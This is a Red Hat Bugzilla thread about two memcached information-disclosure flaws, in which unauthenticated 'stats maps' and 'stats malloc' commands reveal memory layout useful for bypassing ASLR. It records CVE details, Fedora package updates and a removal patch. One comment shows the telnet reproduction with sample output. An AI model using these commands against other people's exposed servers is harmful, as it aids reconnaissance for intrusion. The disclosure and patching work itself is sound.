Red Hat Bugzilla – Bug 498271
CVE-2009-1255, CVE-2009-1494 memcached: multiple vulnerabilities
Last modified: 2009-09-18 16:16:33 EDT
It was reported  that memcached versions 1.2.0-1.2.7 contained a security weakness in the 'stats maps' command, where it displays stack, heap, and shared memory locations. In the event that a buffer overrun was ever discovered in memcached, using the 'stats maps' command could be used to bypass address space layout randomization protection. As well, since memcached offers no default authentication to its port, and thus this command, if the administrator did not firewall or otherwise secure the memcached listening port, a remote attacker could obtain this information easily.
memcached 1.2.8 has been released  and removes the 'stats maps' command entirely.
SecurityFocus reference: http://www.securityfocus.com/bid/34756
I have verified this on Fedora 10; installing memcached and telnetting to port 11211 and issuing "stats maps" provides full information without any authentication required.
I have my CVS access back. I can prepare an updated version of memcached with 1.2.8 today.
Fantastic. Thanks for being so responsive. You will be preparing this for F9, F10, and F11 then?
I haven't kept up with the build system lately, but I see no reason why this couldn't happen on all three. F-9 is pegged at 1.2.5 for some reason, I think there was some problem with selinux that prevented moving forward. I'll see what I can do there.
rawhide, F-10, F-11 all built. F-10/F-11 submitted through bodhi.
Can someone tell me what it takes to get the update through testing and released? This is my first time addressing a security problem.
Hi, Paul. I'm not sure what the steps are on the Fedora side.. I'm trying to find out for you (and my enlightenment as well). Thanks.
Hi Paul. Ok, from what I'm hearing there is very little difference between a security or a non-security update for Fedora. There should be a way to mark it as a security fix (either via the web ui or via bodhi -t security). If you need more than that, please let me know (I've never built anything for Fedora or via bodhi so this is all new to me). Thanks.
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-1255 to
the following vulnerability:
Reference: BUGTRAQ:20090428 Positron Security Advisory #2009-001: Memcached and MemcacheDB ASLR Bypass Weakness
Reference: URL: http://www.securityfocus.com/archive/1/archive/1/503064/100/0/threaded
Reference: MISC: http://www.positronsecurity.com/advisories/2009-001.html
Reference: CONFIRM: http://code.google.com/p/memcachedb/source/browse/trunk/ChangeLog?spec=svn98&r=98
Reference: CONFIRM: http://code.google.com/p/memcachedb/source/detail?r=98
Reference: CONFIRM: http://code.google.com/p/memcachedb/source/diff?spec=svn98&r=98&format=side&path=/trunk/memcachedb.c
Reference: CONFIRM: http://groups.google.com/group/memcached/browse_thread/thread/ff96a9b88fb5d40e
Reference: URL: http://www.securityfocus.com/bid/34756
Reference: URL: http://secunia.com/advisories/34915
Reference: URL: http://secunia.com/advisories/34932
Reference: URL: http://www.vupen.com/english/advisories/2009/1196
Reference: URL: http://www.vupen.com/english/advisories/2009/1197
The process_stat function in (1) Memcached before 1.2.8 and (2)
MemcacheDB 1.2.0 discloses (a) the contents of /proc/self/maps in
response to a stats maps command and (b) memory-allocation statistics
in response to a stats malloc command, which allows remote attackers
to obtain sensitive information such as the locations of memory
regions, and defeat ASLR protection, by sending a command to the
daemon's TCP port.
bodhi still shows this as pending.....
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-1494 to
the following vulnerability:
Reference: MISC: http://code.google.com/p/memcachedb/source/detail?r=98
Reference: MISC: http://code.google.com/p/memcachedb/source/diff?spec=svn98&r=98&format=side&path=/trunk/memcachedb.c
Reference: MISC: http://groups.google.com/group/memcached/browse_thread/thread/ff96a9b88fb5d40e
Reference: MISC: http://memcached.googlecode.com/files/memcached-1.2.8.tar.gz
The process_stat function in Memcached 1.2.8 discloses
memory-allocation statistics in response to a stats malloc command,
which allows remote attackers to obtain potentially sensitive
information by sending this command to the daemon's TCP port.
NOTE: the above description is wrong. This is fixed in memcachedb 1.2.0, but not in memcached 1.2.8, so this actually affects memcached <= 1.2.8 (just verified by compiling new memcached 1.2.8 and running it locally). The 'stats malloc' command most definitely works:
% rpm -q memcached
% memcached -h | head -1
% telnet localhost 11211
Connected to localhost.
Escape character is '^]'.
STAT arena_size 921600
STAT free_chunks 3
STAT fastbin_blocks 0
STAT mmapped_regions 1
STAT mmapped_space 528384
STAT max_total_alloc 0
STAT fastbin_space 0
STAT total_alloc 813488
STAT total_free 108112
STAT releasable_space 107952
I came up with a quick patch to remove the 'stats malloc' command entirely. I'll attach it in a moment. We may want to include that in our updated packages.
Created attachment 342133 [details]
patch to fix CVE-2009-1494
This patch removes the 'stats malloc' command.
Hi, Paul. You may want to replace those packages in bodhi with a new one with the patch I attached to fix the second information disclosure issue. I don't necessarily thing there is anything there that is security-sensitive, but it was removed in memcachedb at the same time as the stats maps command, and a CVE name was assigned. At any rate, I don't think it will hurt to remove it.
I'm also not sure, having never used bodhi myself, but maybe you need to flag this as security when you submit it? I'm not sure. Sorry I'm not much more help with that.
(In reply to comment #9)
> bodhi still shows this as pending.....
Pending means that the update is waiting for Fedora rel-eng to sign packages and push update to testing / stable as you requested.
memcached-1.2.8-1.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report.
memcached-1.2.8-1.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report.